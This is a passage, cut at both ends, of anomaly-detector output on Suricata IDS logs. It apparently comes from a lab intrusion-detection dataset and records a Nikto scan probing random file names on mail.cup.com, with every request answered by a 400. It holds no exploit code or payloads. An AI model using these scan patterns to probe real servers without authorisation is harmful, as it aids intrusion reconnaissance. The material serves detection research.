(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html+\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 
"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46900, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1615758090734080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80", "/parser/model/time": 1583349514.300833, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46902, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.www_acl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30115, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46902, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2081933841044299, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80", "/parser/model/time": 1583349514.303601, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46904, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ca", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.303839, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46904, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1429962100481725, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80", "/parser/model/time": 1583349514.305461, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46906, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.fhp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 